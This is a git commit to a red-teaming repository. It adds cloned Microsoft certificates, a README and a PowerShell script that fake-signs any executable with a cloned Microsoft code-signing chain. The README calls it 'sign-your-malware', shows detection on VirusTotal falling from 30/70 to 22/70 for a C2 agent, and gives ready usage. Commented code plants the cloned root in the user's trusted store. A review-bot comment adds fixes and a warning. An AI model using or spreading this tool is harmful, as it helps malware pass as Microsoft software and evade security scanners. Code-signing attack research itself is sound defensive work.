added self-signed threat
This commit is contained in:
parent
6b7ff300ae
commit
8d24963a0c
BIN
red-teaming/Self-Signed Threat/MSKernel32Leaf.cer
Normal file
BIN
red-teaming/Self-Signed Threat/MSKernel32Leaf.cer
Normal file
Binary file not shown.
BIN
red-teaming/Self-Signed Threat/MSKernel32PCA.cer
Normal file
BIN
red-teaming/Self-Signed Threat/MSKernel32PCA.cer
Normal file
Binary file not shown.
BIN
red-teaming/Self-Signed Threat/MSKernel32Root.cer
Normal file
BIN
red-teaming/Self-Signed Threat/MSKernel32Root.cer
Normal file
Binary file not shown.
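--- /dev/null
+++ b/red-teaming/Self-Signed Threat/README.md
@@ -0,0 +1,19 @@
+## Easy-to-use test-it-yourself sign-your-malware
+
+A Powershell script that signs input Executable file with fake Microsoft code-signing certificate to demonstrate risks of Code Signing attacks.
+
+Script was borrowed from [Matt Graeber, @mattifestation](https://twitter.com/mattifestation) and his [_Code Signing Certificate Cloning Attacks and Defenses_](https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec) and **all credits are his**.
+
+As of 13/07/2022 this dumb trick still gets off the shelf malware evade detection of at least 8 modern security scanners.
+
+| What | Result |
+|------------------------------------------------------------------------------|-----------|
+| Mythic Apollo.exe before fake-signing | [30/70](https://www.virustotal.com/gui/file/1413de7cee2c7c161f814fe93256968450b4e99ae65f0b5e7c2e76128526cc73?nocache=1) |
+| Mythic Apollo.exe after fake-signing with Microsoft code-signing certificate | [22/70](https://www.virustotal.com/gui/file/34543de8a6b24c98ea526d8f2ae5f1dbe99d64386d8a8f46ddbcdcebaac3df65?nocache=1) |
+
+### Usage
+
+```
+PS C:\> . .\Sign-Artifact.ps1
+PS C:\> Sign-Artifact -InputFile malware.exe -OutputFile nomalware.exe -Verbose
+```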
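--- /dev/null
+++ b/red-teaming/Self-Signed Threat/Sign-Artifact.ps1
@@ -0,0 +1,98 @@
+Function Sign-Artifact {
+<#
+.SYNOPSIS
+Signs input executable file with a faked Microsoft code signing certificate.
+
+.DESCRIPTION
+This script uses built-into Windows interfaces to import a fake Microsoft code-signing certificate
+and use it to sign input executable artifact. Result will be signed, although not verifiable executable.
+
+Based on Matt Graeber's implementation:
+https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
+
+.EXAMPLE
+PS C:\> Sign-Artifact -InputFile malware.exe -OutputFile microsoft.exe
+#>
+
+[CmdletBinding()]
+param(
+[Parameter(Mandatory=$True)]
+[string]
+$InputFile,
+
+[Parameter(Mandatory=$True)]
+[string]
+$OutputFile,
+
+[switch]
+$Quiet
+)
+
+$Verbose = $PSCmdlet.MyInvocation.BoundParameters["Verbose"].IsPresent
+
+if (-not(Test-Path $InputFile))
+{
+Write-Error "[!] Input file does not exist! FilePath: $InputFile"
+exit 1
+}
+
+if(Test-Path $OutputFile)
+{
+Remove-Item -Force $OutputFile
+}
+
+#
+# Based on:
+#
+#
+
+# We'll just store the cloned certificates in current user "Personal" store for now.
+$CertStoreLocation = @{ CertStoreLocation = 'Cert:\CurrentUser\My' }
+
+$MS_Root_Cert = Get-PfxCertificate -FilePath (Join-Path -Path $PSScriptRoot -ChildPath "\MSKernel32Root.cer")
+$Cloned_MS_Root_Cert = New-SelfSignedCertificate -CloneCert $MS_Root_Cert @CertStoreLocation
+
+$MS_PCA_Cert = Get-PfxCertificate -FilePath (Join-Path -Path $PSScriptRoot -ChildPath "MSKernel32PCA.cer")
+$Cloned_MS_PCA_Cert = New-SelfSignedCertificate -CloneCert $MS_PCA_Cert -Signer $Cloned_MS_Root_Cert @CertStoreLocation
+
+$MS_Leaf_Cert = Get-PfxCertificate -FilePath (Join-Path -Path $PSScriptRoot -ChildPath "MSKernel32Leaf.cer")
+$Cloned_MS_Leaf_Cert = New-SelfSignedCertificate -CloneCert $MS_Leaf_Cert -Signer $Cloned_MS_PCA_Cert @CertStoreLocation
+
+
+# Validate that that $OutputFile is not signed.
+if($Verbose)
+{
+Write-Host "`n================================================================================================`n[.] Before signing: `n"
+Get-AuthenticodeSignature -FilePath $InputFile
+}
+
+Copy-Item -Force $InputFile $OutputFile | Out-Null
+
+
+# Sign $OutputFile with the cloned Microsoft leaf certificate.
+Set-AuthenticodeSignature -Certificate $Cloned_MS_Leaf_Cert -FilePath $OutputFile | Out-Null
+
+# The certificate will not properly validate because the root certificate is not trusted.
+
+# View the StatusMessage property to see the reason why Set-AuthenticodeSignature returned "UnknownError"
+# "A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider"
+
+if($Verbose)
+{
+Write-Host "`n================================================================================================`n[+] After signing: `n"
+Get-AuthenticodeSignature -FilePath $OutputFile
+}
+
+if(-not $Quiet -or $Verbose)
+{
+Get-AuthenticodeSignature -FilePath $OutputFile | Format-List *
+}
+
+# Save the root certificate to disk and import it into the current user root store.
+# Upon doing this, the $OutputFile signature will validate properly.
+# Export-Certificate -Type CERT -FilePath (Join-Path -Path $PSScriptRoot -ChildPath "MSKernel32Root_Cloned.cer") -Cert $Cloned_MS_Root_Cert
+# Import-Certificate -FilePath (Join-Path -Path $PSScriptRoot -ChildPath "MSKernel32Root_Cloned.cer") -CertStoreLocation Cert:\CurrentUser\Root\
+#
+# # You may need to start a new PowerShell process for the valid signature to take effect.
+# Get-AuthenticodeSignature -FilePath $FilePath
+}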
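Review bot: `exit 1` in the `if (-not(Test-Path $InputFile))` branch terminates the hosting PowerShell process rather than returning from `Sign-Artifact` — the README dot-sources the script into an interactive session, so a mistyped `-InputFile` closes the operator's shell; `throw "[!] Input file does not exist! FilePath: $InputFile"` (or keep the `Write-Error` and follow it with `return`) preserves the message while staying inside the function. The three `New-SelfSignedCertificate -CloneCert ... @CertStoreLocation` calls also write a cloned Microsoft root, PCA and leaf certificate, each with a freshly generated private key, into `Cert:\CurrentUser\My` on every invocation and nothing removes them afterwards, so repeated runs leave a growing set of fake-Microsoft certificates and keys in the operator's personal store; wrapping the signing step so that a cleanup such as `Remove-Item -Path $Cloned_MS_Leaf_Cert.PSPath, $Cloned_MS_PCA_Cert.PSPath, $Cloned_MS_Root_Cert.PSPath -DeleteKey -Force` runs in a `finally` would return the store to its prior state. The commented-out `Import-Certificate ... -CertStoreLocation Cert:\CurrentUser\Root\` block deserves a warning in the header comment, e.g. `# WARNING: importing the cloned root makes every artifact signed by this chain appear trusted for the current user — only do this on a disposable test VM`, since enabling it is a trust-store subversion in its own right rather than just a demo step.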
BIN
red-teaming/Self-Signed Threat/sigcheck.exe
Normal file
BIN
red-teaming/Self-Signed Threat/sigcheck.exe
Normal file
Binary file not shown.
BIN
red-teaming/Self-Signed Threat/sigcheck64.exe
Normal file
BIN
red-teaming/Self-Signed Threat/sigcheck64.exe
Normal file
Binary file not shown.